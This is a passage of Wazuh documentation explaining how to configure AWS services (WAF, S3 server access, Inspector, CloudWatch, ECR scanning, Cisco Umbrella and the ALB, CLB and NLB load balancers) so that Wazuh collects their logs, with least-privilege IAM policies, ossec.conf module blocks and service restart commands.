                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon WAF logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="waf">
        <name><WAZUH_AWS_BUCKET></name>
        <path>waf</path>                   <!-- PUT THE S3 BUCKET PREFIX IF THE LOGS ARE NOT STORED IN THE BUCKET'S ROOT PATH -->
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
HTTP Request headers

The Wazuh AWS WAF implementation parses the header information present in the httpRequest field, allowing filtering by these headers and their values on the Wazuh dashboard. During this parsing, any non-standard header will be extracted and removed from the event before sending it to analysisd. Here is the complete list of the allowed standard header fields:

a-im
accept
accept-charset
accept-encoding
accept-language
access-control-request-method
access-control-request-headers
authorization
cache-control
connection
content-encoding
content-length
content-type
cookie
date
expect
forwarded
from
host
http2-settings
if-match
if-modified-since
if-none-match
if-range
if-unmodified-since
max-forwards
origin
pragma
prefer
proxy-authorization
range
referer
te
trailer
transfer-encoding
user-agent
upgrade
via
warning
x-requested-with
x-forwarded-for
x-forwarded-host
x-forwarded-proto
Use case

AWS WAF is a security service that helps protect your web applications or APIs from threats. By monitoring blocked requests, you can identify the types of threats your application is facing. This can help you understand the security landscape and adjust your defenses accordingly.

Monitoring blocked web application requests

If web requests are blocked by the rules of the Amazon Web ACL, the following alerts with rule ID 80442 and 80443 will be shown on the Wazuh dashboard.

Expand an alert to find more information such as the Request-URI, the method, and the Web ACL rule label that blocked the request.

Amazon S3 Server Access

Amazon S3 server access logging provides detailed records for the requests that are made to a bucket. Server access logs are useful for many applications. For example, access log information can be useful in security and access audits. It can also help you learn about your customer base and understand your Amazon S3 bill.

AWS configuration

The following sections cover how to configure the Amazon S3 Server Access service to integrate with Wazuh.

Amazon S3 server access configuration
  1. Create a new S3 bucket to store the access logs in it. If you want to use an existing one, skip this step.

  2. On your AWS console search for "S3" or go to Services > Storage > S3.

  3. Look for the S3 bucket you want to monitor and click on its name.

  4. Go to the Properties tab, scroll down until you find the Server access logging, and click Edit.

  5. Check the Enable option, and click Browse S3 to look for the bucket in which you want S3 Server Access logs to be stored. In our case, the logs are stored in the s3-server-logs/ path of the monitored S3 bucket.

    Note

    It is possible to store the S3 Server Access logs in the same bucket to be monitored. It is also possible to specify a custom path inside the bucket to store the logs in it.

  6. Finally, click on the Save changes. S3 Server Access logs will start to be stored in the specified path.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon S3 Server Access logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="server_access">
        <name><WAZUH_AWS_BUCKET></name>       <!-- PUT THE S3 BUCKET CHOSEN IN STEP 5 HERE -->
        <path>s3-server-logs</path>                   <!-- IF THE LOGS ARE NOT STORED IN THE BUCKET'S ROOT PATH, PUT  THE PATH TO THE LOGS CHOSEN IN STEP 5 HERE -->
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

Amazon S3 Server Access logs provide detailed records for the requests that were made to a bucket.

Below is a use case for Wazuh alerts built for Amazon S3 Server Access logs.

Monitoring server access logs

The following screenshots shows some alerts with rule ID 80364 and 80367 generated for requests made to a monitored S3 bucket.

Expand an alert to find more information about the monitored S3 bucket, the operation being performed, and the request URI.

Amazon Inspector

Amazon Inspector is an automated security assessment service that helps improve the security and compliance of applications deployed on AWS. Two versions are available:

  • Amazon Inspector Classic: The original service, which assesses applications for exposure, vulnerabilities, and deviations from best practices.

  • Amazon Inspector (v2): The new version, offering consolidated scanning for EC2 instances, container images in Amazon ECR, and AWS Lambda functions.

Both versions produce detailed security findings prioritized by severity. Findings can be reviewed directly or included in assessment reports accessible via the Amazon Inspector console or API.

AWS configuration

Learn how to configure Amazon Inspector (Classic and v2) integration in Wazuh.

Amazon Inspector Classic configuration

Amazon Inspector (v2) is available in your AWS account. To start using it:

  1. Open the Amazon Inspector page in the AWS Management Console.

  2. Click Get Started to access the dashboard.

  3. Configure your scanning preferences under General settings:

    • Enable EC2 scanning

    • Enable ECR scanning

    • Enable Lambda function scanning

Note

For detailed instructions on configuring scanning preferences, see the Amazon Inspector documentation.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "inspector:ListFindings",
                "inspector:DescribeFindings",
                "inspector2:ListFindings"
            ],
            "Resource": "*"
        }
    ]
}

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon Inspector logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with both Inspector versions:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>no</run_on_start>
      <skip_on_error>no</skip_on_error>
      <service type="inspector">
        <aws_profile>default</aws_profile>
        <regions>us-east-1,us-east-2</regions>
      </service>
    </wodle>
    

    You must specify at least a region. You can add multiple comma-separated regions.

    Note

    The same configuration block processes findings from both Inspector Classic and Inspector (v2). Findings from v2 will have aws.source set to inspector2.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon CloudWatch Logs

AWS CloudWatch Logs is a service that allows the users to centralize the logs from all their systems, applications, and AWS services in a single place. To understand how Cloudwatch Logs works it is important to learn about the following concepts:

  • Log events: CloudWatch saves the logs generated by the application or resource being monitored as log events. A log event is a record with two properties: the timestamp when the event occurred and the raw log message.

  • Log streams: Log events are stored in log streams. A log stream represents a sequence of events coming from the application instance or resource being monitored. All log events in a log stream share the same source.

  • Log groups: Log streams are grouped using log groups. A log group defines a group of log streams that share retention, monitoring, and access control settings.

AWS configuration

Learn how to configure the Amazon CloudWatch service to integrate with Wazuh.

Amazon CloudWatch configuration

AWS CloudWatch logs can be accessed by using the Wazuh CloudWatch Logs integration. The AWS API allows Wazuh to retrieve those logs, analyze them, and raise alerts if applicable.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "logs:DescribeLogStreams",
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": "logs:GetLogEvents",
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:log-stream:<LOG_STREAM_NAME>"
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": "logs:DescribeLogStreams",
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:*"
        },
        {
            "Sid": "VisualEditor1",
            "Effect": "Allow",
            "Action": [
                "logs:GetLogEvents",
                "logs:DeleteLogStream"
            ],
            "Resource": "arn:aws:logs:<REGION>:<ACCOUNT_ID>:log-group:<LOG_GROUP_NAME>:log-stream:<LOG_STREAM_NAME>"
        }
    ]
}

Note

<REGION>, <ACCOUNT_ID>, <LOG_GROUP_NAME>, <LOG_GROUP_NAME> and <LOG_STREAM_NAME> are placeholders. Replace them with the appropriate values.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon CloudWatch logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with CloudWatch Logs:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>5m</interval>
      <run_on_start>yes</run_on_start>
      <service type="cloudwatchlogs">
        <aws_profile>default</aws_profile>
        <aws_log_groups>example_log_group</aws_log_groups>
        <regions>us-east-1</regions>
      </service>
    </wodle>
    

    You must specify at least one AWS log group from where the logs will be extracted. You can add multiple regions by separating them with commas. If no region is specified the Wazuh module for AWS will look for the log group in every available region.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
CloudWatch Logs use cases

Check the Amazon ECR Image scanning section to learn how to use the CloudWatch Logs integration to pull logs from Amazon ECR Image scans.

Amazon ECR Image scanning

Amazon ECR image scanning uses the Common Vulnerabilities and Exposures (CVEs) database from the open source Clair project to detect software vulnerabilities in container images and provide a list of scan findings, which can be easily integrated into Wazuh thanks to the Amazon CloudWatch Logs integration.

Amazon ECR sends an event to Amazon EventBridge when an image scan is completed. The event itself is only a summary and does not contain the details of the scan findings. However, it is possible to configure a Lambda function to request the scan findings details and store them in CloudWatch Logs. Here is a quick summary of what the workflow looks like:

  1. An image scan is triggered.

  2. Once the scan is completed Amazon ECR sends an event to EventBridge.

  3. The "Scan completed" event triggers a Lambda function.

  4. The lambda function takes the data from the "Scan completed" event and requests the scan details.

  5. The Lambda function creates a log group and a log stream in CloudWatch Logs to store the response received.

  6. Wazuh pulls the logs from the CloudWatch log groups using the CloudWatch Logs integration.

AWS configuration

The following sections cover how to configure AWS to store the scan findings in CloudWatch Logs and how to ingest them into Wazuh.

Amazon ECR Image scan configuration

AWS provides a template that logs to CloudWatch the findings of Amazon ECR scans of images. The template uses an AWS Lambda function to accomplish this.

Uploading the template and creating a stack, uploading the images to Amazon ECR, scanning the images, and using the logger all require specific permissions. Because of this, you need to create a custom policy granting these permissions.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

You need the permissions listed below inside the sections for RoleCreator and PassRole to create and delete the stack based on the template.

Warning

These permissions must be bound to the specific resources due to overly permissive actions.

{
   "Sid": "RoleCreator",
   "Effect": "Allow",
   "Action": [
      "iam:CreateRole",
      "iam:PutRolePolicy",
      "iam:AttachRolePolicy",
      "iam:DeleteRolePolicy",
      "iam:DeleteRole",
      "iam:GetRole",
      "iam:GetRolePolicy",
      "iam:PassRole"
   ],
   "Resource": "arn:aws:iam::<ACCOUNT_ID>:role/*"
},
{
   "Sid": "PassRole",
   "Effect": "Allow",
   "Action": "iam:PassRole",
   "Resource": "arn:aws:iam::<ACCOUNT_ID>:role/*-LambdaExecutionRole*"
}
CloudFormation stack permissions

A CloudFormation stack is a collection of AWS resources that can be managed as a single unit, including creation, update, or deletion. You need the following permissions to create and delete any template-based CloudFormation stack.

{
   "Sid": "CloudFormationStackCreation",
   "Effect": "Allow",
   "Action": [
      "cloudformation:CreateStack",
      "cloudformation:ValidateTemplate",
      "cloudformation:CreateUploadBucket",
      "cloudformation:GetTemplateSummary",
      "cloudformation:DescribeStackEvents",
      "cloudformation:DescribeStackResources",
      "cloudformation:ListStacks",
      "cloudformation:DeleteStack",
      "s3:PutObject",
      "s3:ListBucket",
      "s3:GetObject",
      "s3:CreateBucket"
   ],
   "Resource": "*"
}
ECR registry and repository permissions

This Amazon ECR permission allows calls to the API through an IAM policy.

Note

Before authenticating to a registry and pushing or pulling any images from any Amazon ECR repository, you need ecr:GetAuthorizationToken.

{
   "Sid": "ECRUtilities",
   "Effect": "Allow",
   "Action": [
      "ecr:GetAuthorizationToken",
      "ecr:DescribeRepositories"
   ],
   "Resource": "*"
}
Image pushing and scanning permissions

You need the following Amazon ECR permissions to push images. They are scoped down to a specific repository. The steps to push Docker images are described in the Amazon ECR - pushing a docker image documentation.

{
   "Sid": "ScanPushImage",
   "Effect": "Allow",
   "Action": [
      "ecr:CompleteLayerUpload",
      "ecr:UploadLayerPart",
      "ecr:InitiateLayerUpload",
      "ecr:BatchCheckLayerAvailability",
      "ecr:PutImage",
      "ecr:ListImages",
      "ecr:DescribeImages",
      "ecr:DescribeImageScanFindings",
      "ecr:StartImageScan"
   ],
   "Resource": "arn:aws:ecr:<REGION>:<ACCOUNT_ID>:repository/<REPOSITORY_NAME>"
}
Amazon Lambda and Amazon EventBridge permissions

You need the following permissions to create and delete the resources handled by the Scan Findings Logger template.

{
   "Sid": "TemplateRequired0",
   "Effect": "Allow",
   "Action": [
      "lambda:RemovePermission",
      "lambda:DeleteFunction",
      "lambda:GetFunction",
      "lambda:CreateFunction",
      "lambda:AddPermission"
   ],
   "Resource": "arn:aws:lambda:<REGION>:<ACCOUNT_ID>:*"
},
{
   "Sid": "TemplateRequired1",
   "Effect": "Allow",
   "Action": [
      "events:RemoveTargets",
      "events:DeleteRule",
      "events:PutRule",
      "events:DescribeRule",
      "events:PutTargets"
   ],
   "Resource": "arn:aws:events:<REGION>:<ACCOUNT_ID>:*"
}
How to create the CloudFormation Stack
  1. Download the ECR Image Scan findings logger template from the official aws-samples GitHub repository.

  2. Access CloudFormation and click on Create stack.

  3. Create a new stack using the template from step 1.

  4. Choose a name for the stack and finish the creation process. No additional configuration is required.

  5. Wait until CREATE_COMPLETE status is reached. The stack containing the AWS Lambda is now ready to be used.

Once the stack configuration is completed, the Lambda can be tested by manually triggering an image scan of a container in Amazon ECR private registry. The scan results in the creation of a CloudWatch log group called /aws/ecr/image-scan-findings/<NAME_OF_ECR_REPOSITORY> containing the scan results. For every new scan, the corresponding log streams are created inside the log group.

Configure Wazuh to process Amazon ECR image scanning logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration block to enable the integration with Amazon ECR Image scanning. Replace <NAME_OF_ECR_REPOSITORY> with the name of the Amazon ECR repository:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>5m</interval>
      <run_on_start>yes</run_on_start>
      <service type="cloudwatchlogs">
        <aws_profile>default</aws_profile>
        <aws_log_groups>/aws/ecr/<NAME_OF_ECR_REPOSITORY></aws_log_groups>
      </service>
    </wodle>
    

    Note

    Check the AWS CloudWatch Logs integration to learn more about how the CloudWatch Logs integration works.

  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Use case

Amazon ECR provides an image scanning feature that uses the Common Vulnerabilities and Exposure (CVEs) database from the open source Clair project to detect vulnerabilities in container images. Wazuh polls and detects these vulnerabilities from AWS CloudWatch.

Detecting vulnerabilities in container images

Check the Detecting vulnerabilities in container images using Amazon ECR blog to learn how to detect vulnerabilities in container images using Wazuh and Amazon ECR integration.

Cisco Umbrella

Cisco Umbrella is a cloud-based Secure Internet Gateway (SIG) platform that provides you with multiple levels of defense against internet-based threats.

Cisco Umbrella configuration

You can find how to configure this service by following the official documentation on its official website. Furthermore, it is mandatory to configure that the logs generated by this service would be exported to an S3 bucket. You can find how to do that in the log management section of the official documentation.

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Cisco Umbrella logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
    
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
    
      <bucket type="cisco_umbrella">
        <name><WAZUH_AWS_BUCKET></name>
        <path>dnslogs</path>
        <aws_profile>default</aws_profile>
      </bucket>
    
      <bucket type="cisco_umbrella">
        <name><WAZUH_AWS_BUCKET></name>
        <path>proxylogs</path>
        <aws_profile>default</aws_profile>
      </bucket>
    
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Elastic Load Balancers

AWS Elastic Load Balancers are services that distribute incoming traffic across multiple targets. The following sections explain the different types of load balancers available and how to configure and monitor them with Wazuh:

Amazon ALB

Application Load Balancers (Amazon ALB) Elastic Load Balancing automatically distributes the incoming traffic across multiple targets, such as EC2 instances, containers, and IP addresses, in one or more Availability Zones. It monitors the health of its registered targets and routes traffic only to the healthy targets. Users can select the type of load balancer that best suits their needs. An Application Load Balancer functions at the application layer, the seventh layer of the Open Systems Interconnection (OSI) model. After the load balancer receives a request, it evaluates the listener rules in priority order to determine which rule to apply then selects a target from the target group for the rule action.

AWS configuration

The following sections cover how to configure the Amazon ALB service to integrate with Wazuh.

Amazon ALB configuration
  1. Go to S3 buckets, copy the name of an existing S3 bucket or create a new one.

  2. On your AWS console, search for "EC2" or go to Services > Compute > EC2.

  3. Go to Load Balancing > Load Balancers on the left menu. Create a new load balancer or select one or more load balancers and select Edit load balancer attributes on the Actions menu.

  4. In the Monitoring tab, enable Access logs and define the S3 bucket and the path where the logs will be stored.

    Note

    To enable access logs for ALB (Application Load Balancers), check the following link:

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon ALB logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="alb">
        <name><WAZUH_AWS_BUCKET></name>
        <path>ALB</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon CLB

Classic Load Balancers (Amazon CLB) Elastic Load Balancing automatically distributes the incoming traffic across multiple targets, such as EC2 instances, containers, and IP addresses, in one or more Availability Zones. It monitors the health of its registered targets and routes traffic only to the healthy targets. Users can select the type of load balancer that best suits their needs. A Classic Load Balancer makes routing decisions at either the transport layer (TCP/SSL) or the application layer (HTTP/HTTPS). Classic Load Balancers currently require a fixed relationship between the load balancer port and the container instance port.

AWS configuration

The following sections cover how to configure the Amazon CLB service to integrate with Wazuh.

Amazon CLB configuration
  1. Go to S3 buckets, copy the name of an existing S3 bucket or create a new one.

  2. On your AWS console, search for "EC2" or go to Services > Compute > EC2.

  3. Go to Load Balancing > Load Balancers on the left menu. Create a new load balancer or select one or more load balancers and select Edit load balancer attributes on the Actions menu.

  4. In the Monitoring tab define the S3 bucket and the path where the logs will be stored.

    Note

    To enable access logs for CLB (Classic Load Balancers), check the following link:

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon CLB logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
      <skip_on_error>yes</skip_on_error>
      <bucket type="clb">
        <name><WAZUH_AWS_BUCKET></name>
        <path>CLB</path>
        <aws_profile>default</aws_profile>
      </bucket>
    </wodle>
    
  3. Save the changes and restart Wazuh to apply the changes. The service can be manually restarted using the following command outside the Wazuh dashboard:

    • Wazuh manager:

      # systemctl restart wazuh-manager
      
    • Wazuh agent:

      # systemctl restart wazuh-agent
      
Amazon NLB

Network Load Balancers (Amazon NLB) Elastic Load Balancing automatically distributes the incoming traffic across multiple targets, such as EC2 instances, containers, and IP addresses, in one or more Availability Zones. It monitors the health of its registered targets and routes traffic only to the healthy targets. Users can select the type of load balancer that best suits their needs. A Network Load Balancer functions at the fourth layer of the Open Systems Interconnection (OSI) model. It can handle millions of requests per second. After the load balancer receives a connection request, it selects a target from the target group for the default rule. It attempts to open a TCP connection to the selected target on the port specified in the listener configuration.

AWS configuration

The following sections cover how to configure the Amazon NLB service to integrate with Wazuh.

Amazon NLB configuration
  1. Go to S3 buckets, copy the name of an existing S3 bucket or create a new one.

  2. On your AWS console, search for "EC2" or go to Services > Compute > EC2.

  3. Go to Load Balancing > Load Balancers on the left menu. Create a new load balancer or select one or more load balancers and select Edit load balancer attributes on the Actions menu.

  4. In the Monitoring tab define the S3 bucket and the path where the logs will be stored.

    Note

    To enable access logs for NLB (Network Load Balancers), check the following link:

Policy configuration

Follow the creating an AWS policy guide to create a policy using the Amazon Web Services console.

Take into account that the policies below follow the principle of least privilege to ensure that only the minimum permissions are provided to the AWS IAM user.

To allow an AWS user to use the Wazuh module for AWS with read-only permissions, it must have a policy like the following attached:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "VisualEditor0",
            "Effect": "Allow",
            "Action": [
                "s3:GetObject",
                "s3:ListBucket"
            ],
            "Resource": [
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
            ]
        }
    ]
}

If it is necessary to delete the log files once they have been collected, the associated policy would be as follows:

{
     "Version": "2012-10-17",
     "Statement": [
         {
             "Sid": "VisualEditor0",
             "Effect": "Allow",
             "Action": [
                 "s3:GetObject",
                 "s3:ListBucket",
                 "s3:DeleteObject"
             ],
             "Resource": [
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>/*",
                 "arn:aws:s3:::<WAZUH_AWS_BUCKET>"
             ]
         }
     ]
 }

Note

<WAZUH_AWS_BUCKET> is a placeholder. Replace it with the actual name of the bucket from which you want to retrieve logs.

After creating a policy, you can attach it directly to a user or to a group to which the user belongs. In attaching a policy to an IAM user group, you see how to attach a policy to a group. More information on how to use other methods is available in the AWS documentation.

Configure Wazuh to process Amazon NLB logs
  1. Access the Wazuh configuration in Server management > Settings using the Wazuh dashboard or by manually editing the /var/ossec/etc/ossec.conf file in the Wazuh server or agent.

  2. Add the following Wazuh module for AWS configuration to the file, replacing <WAZUH_AWS_BUCKET> with the name of the S3 bucket:

    <wodle name="aws-s3">
      <disabled>no</disabled>
      <interval>10m</interval>
      <run_on_start>yes</run_on_start>
